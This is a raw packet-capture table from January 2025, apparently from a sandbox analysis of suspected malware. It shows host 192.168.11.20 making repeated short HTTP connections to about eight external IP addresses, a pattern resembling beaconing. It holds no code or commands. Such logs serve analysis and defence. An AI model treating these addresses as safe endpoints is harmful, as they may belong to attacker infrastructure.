                                                                          Jan 9, 2025 16:48:19.889671087 CET8049757199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:19.889986038 CET4975780192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:19.894273996 CET4975780192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:20.067306995 CET8049757199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:20.080899954 CET8049757199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:20.080950975 CET8049757199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:20.081387997 CET4975780192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:20.082808971 CET4975780192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:20.255248070 CET8049757199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:34.517446995 CET4975880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:34.818049908 CET804975847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:34.818365097 CET4975880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:34.821835041 CET4975880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:35.122415066 CET804975847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:35.800178051 CET804975847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:35.800226927 CET804975847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:35.800442934 CET4975880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:36.336872101 CET4975880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:37.352585077 CET4975980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:37.657780886 CET804975947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:37.658051968 CET4975980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:37.664752007 CET4975980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:37.969996929 CET804975947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:38.696535110 CET804975947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:38.696552038 CET804975947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:38.696763039 CET4975980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:39.180054903 CET4975980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:40.195636034 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:40.495326042 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:40.495528936 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:40.502289057 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:40.502326012 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:40.802182913 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:40.802391052 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:40.802651882 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:40.802882910 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:40.803122044 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:41.498956919 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:41.498977900 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:41.499192953 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:42.007590055 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:43.023248911 CET4976180192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:43.337007046 CET804976147.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:43.337404013 CET4976180192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:43.342102051 CET4976180192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:43.655563116 CET804976147.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:44.345208883 CET804976147.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:44.345257044 CET804976147.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:44.345642090 CET4976180192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:44.346270084 CET4976180192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:44.659893036 CET804976147.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:49.515994072 CET4976280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:49.652894974 CET804976276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:49.653096914 CET4976280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:49.659240007 CET4976280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:49.795423031 CET804976276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:49.795669079 CET804976276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:49.795814991 CET4976280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:51.161875963 CET4976280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:52.177545071 CET4976380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:52.314389944 CET804976376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:52.314632893 CET4976380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:52.318074942 CET4976380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:52.453670979 CET804976376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:52.453888893 CET804976376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:52.454030991 CET4976380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:53.833105087 CET4976380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:54.850198030 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:54.987998962 CET804976476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:54.988254070 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:54.994981050 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:54.995001078 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:55.131616116 CET804976476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:55.132807970 CET804976476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:55.133171082 CET804976476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:55.135523081 CET804976476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:55.135737896 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:56.504543066 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.521464109 CET4976580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.658592939 CET804976576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:57.658920050 CET4976580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.663496971 CET4976580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.803649902 CET804976576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:57.803693056 CET804976576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:57.804012060 CET4976580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.804640055 CET4976580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.940630913 CET804976576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:49:03.276185989 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:04.283029079 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:05.613902092 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.613979101 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.614192009 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:05.620799065 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:05.969324112 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.970071077 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.970114946 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.970153093 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.970372915 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:07.127331972 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:08.144084930 CET4976780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:08.494354010 CET8049767160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:08.494656086 CET4976780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:08.501307964 CET4976780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:08.851257086 CET8049767160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:08.852286100 CET8049767160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:08.852333069 CET8049767160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:08.852371931 CET8049767160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:08.852586031 CET4976780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:10.017198086 CET4976780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:11.032939911 CET4976880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:11.386279106 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.386557102 CET4976880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:11.394234896 CET4976880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:11.394298077 CET4976880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:11.747178078 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747221947 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747670889 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747716904 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747750998 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747777939 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747805119 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747833967 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747863054 CET4976880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:12.100543976 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:13.929639101 CET4976980192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:14.276446104 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:14.276731968 CET4976980192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:14.279927015 CET4976980192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:14.626492023 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:14.627182007 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:14.627224922 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:14.627260923 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:14.627558947 CET4976980192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:14.628410101 CET4976980192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:14.974793911 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:19.790178061 CET4977080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:19.908843040 CET8049770104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:19.909065962 CET4977080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:19.912571907 CET4977080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:20.031169891 CET8049770104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:20.045648098 CET8049770104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:20.046046972 CET8049770104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:20.046309948 CET4977080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:21.421216965 CET4977080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:22.437958956 CET4977180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:22.557507992 CET8049771104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:22.557725906 CET4977180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:22.564306974 CET4977180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:22.683890104 CET8049771104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:22.705631018 CET8049771104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:22.705799103 CET8049771104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:22.706079960 CET4977180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:24.076740026 CET4977180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:25.093664885 CET4977280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:25.212879896 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.213366985 CET4977280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:25.216981888 CET4977280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:25.217051029 CET4977280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:25.336482048 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.336693048 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.336934090 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.337244034 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.337285042 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.349929094 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.350756884 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.350991964 CET4977280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:26.732544899 CET4977280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:27.748106956 CET4977380192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:27.866638899 CET8049773104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:27.866848946 CET4977380192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:27.869154930 CET4977380192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:27.987648010 CET8049773104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:27.995160103 CET8049773104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:27.995642900 CET8049773104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:27.995965004 CET4977380192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:27.996670961 CET4977380192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:28.115119934 CET8049773104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:42.136117935 CET4977480192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:42.360488892 CET8049774136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:42.360698938 CET4977480192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:42.366858006 CET4977480192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:42.591408014 CET8049774136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:42.591762066 CET8049774136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:42.591785908 CET8049774136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:42.592031002 CET4977480192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:43.869559050 CET4977480192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:44.886336088 CET4977580192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:45.111675978 CET8049775136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:45.111999989 CET4977580192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:45.118617058 CET4977580192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:45.344017982 CET8049775136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:45.344302893 CET8049775136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:45.344347000 CET8049775136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:45.344603062 CET4977580192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:46.634063959 CET4977580192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:47.650444984 CET4977680192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:47.885870934 CET8049776136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:47.886102915 CET4977680192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:47.892793894 CET4977680192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:47.892848015 CET4977680192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:48.122062922 CET8049776136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:48.122195959 CET8049776136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:48.122446060 CET8049776136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:48.122656107 CET8049776136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:48.122906923 CET8049776136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:48.122936010 CET8049776136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:48.122947931 CET8049776136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:48.123080969 CET4977680192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:49.399719954 CET4977680192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:50.416599035 CET4977780192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:50.641083002 CET8049777136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:50.641283989 CET4977780192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:50.645917892 CET4977780192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:50.870310068 CET8049777136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:50.871047974 CET8049777136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:50.871092081 CET8049777136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:50.871490955 CET4977780192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:50.872667074 CET4977780192.168.11.20136.243.64.147
                                                                          Jan 9, 2025 16:49:51.096913099 CET8049777136.243.64.147192.168.11.20
                                                                          Jan 9, 2025 16:49:56.248780966 CET4977880192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:49:56.546510935 CET8049778202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:49:56.546765089 CET4977880192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:49:56.550620079 CET4977880192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:49:56.848273039 CET8049778202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:49:56.893767118 CET8049778202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:49:56.893810034 CET8049778202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:49:56.894043922 CET4977880192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:49:58.053956985 CET4977880192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:49:59.069710970 CET4977980192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:49:59.364908934 CET8049779202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:49:59.365247965 CET4977980192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:49:59.368778944 CET4977980192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:49:59.664233923 CET8049779202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:49:59.710071087 CET8049779202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:49:59.710118055 CET8049779202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:49:59.710386038 CET4977980192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:00.881474972 CET4977980192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:01.898525000 CET4978080192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:02.202959061 CET8049780202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:02.203174114 CET4978080192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:02.209969997 CET4978080192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:02.210005999 CET4978080192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:02.514503002 CET8049780202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:02.514728069 CET8049780202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:02.514741898 CET8049780202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:02.515033960 CET8049780202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:02.515048027 CET8049780202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:02.515209913 CET8049780202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:02.566278934 CET8049780202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:02.566293955 CET8049780202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:02.566505909 CET4978080192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:03.724781036 CET4978080192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:04.741606951 CET4978180192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:05.041197062 CET8049781202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:05.041445971 CET4978180192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:05.043828011 CET4978180192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:05.343453884 CET8049781202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:05.566122055 CET8049781202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:05.566138029 CET8049781202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:05.566421986 CET4978180192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:05.567126036 CET4978180192.168.11.20202.95.11.110
                                                                          Jan 9, 2025 16:50:05.866420031 CET8049781202.95.11.110192.168.11.20
                                                                          Jan 9, 2025 16:50:10.767122030 CET4978280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:10.905216932 CET804978276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:10.905483961 CET4978280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:10.911880016 CET4978280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:11.048551083 CET804978276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:11.048593998 CET804978276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:11.048801899 CET4978280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:12.425976992 CET4978280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:13.441582918 CET4978380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:14.455758095 CET4978380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:14.593086004 CET804978376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:14.593306065 CET4978380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:14.596770048 CET4978380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:14.734087944 CET804978376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:14.734131098 CET804978376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:14.734266996 CET4978380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:16.112643003 CET4978380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:17.129574060 CET4978480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:17.268563986 CET804978476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:17.268820047 CET4978480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:17.275460005 CET4978480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:17.275537014 CET4978480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:17.418812990 CET804978476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:17.419385910 CET804978476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:17.419428110 CET804978476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:17.419595003 CET4978480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:18.784054041 CET4978480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:19.800826073 CET4978580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:19.939301014 CET804978576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:19.939495087 CET4978580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:19.942708015 CET4978580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:20.090145111 CET804978576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:20.090154886 CET804978576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:20.090490103 CET4978580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:20.091725111 CET4978580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:50:20.228374004 CET804978576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:50:25.313998938 CET4978680192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:25.487694025 CET8049786103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:25.487963915 CET4978680192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:25.494653940 CET4978680192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:25.668437004 CET8049786103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:25.749278069 CET8049786103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:25.749299049 CET8049786103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:25.749494076 CET4978680192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:27.001038074 CET4978680192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:28.017678976 CET4978780192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:28.191350937 CET8049787103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:28.191631079 CET4978780192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:28.198297024 CET4978780192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:28.372354984 CET8049787103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:28.452150106 CET8049787103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:28.452159882 CET8049787103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:28.452346087 CET4978780192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:29.703520060 CET4978780192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:30.719228029 CET4978880192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:30.893115997 CET8049788103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:30.893323898 CET4978880192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:30.896866083 CET4978880192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:30.896893978 CET4978880192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:30.896965027 CET4978880192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:31.070748091 CET8049788103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:31.070761919 CET8049788103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:31.070770979 CET8049788103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:31.071088076 CET8049788103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:31.071336985 CET8049788103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:31.150913000 CET8049788103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:31.150928020 CET8049788103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:31.151067972 CET4978880192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:32.406136036 CET4978880192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:33.422913074 CET4978980192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:33.596860886 CET8049789103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:33.597100973 CET4978980192.168.11.20103.106.67.112
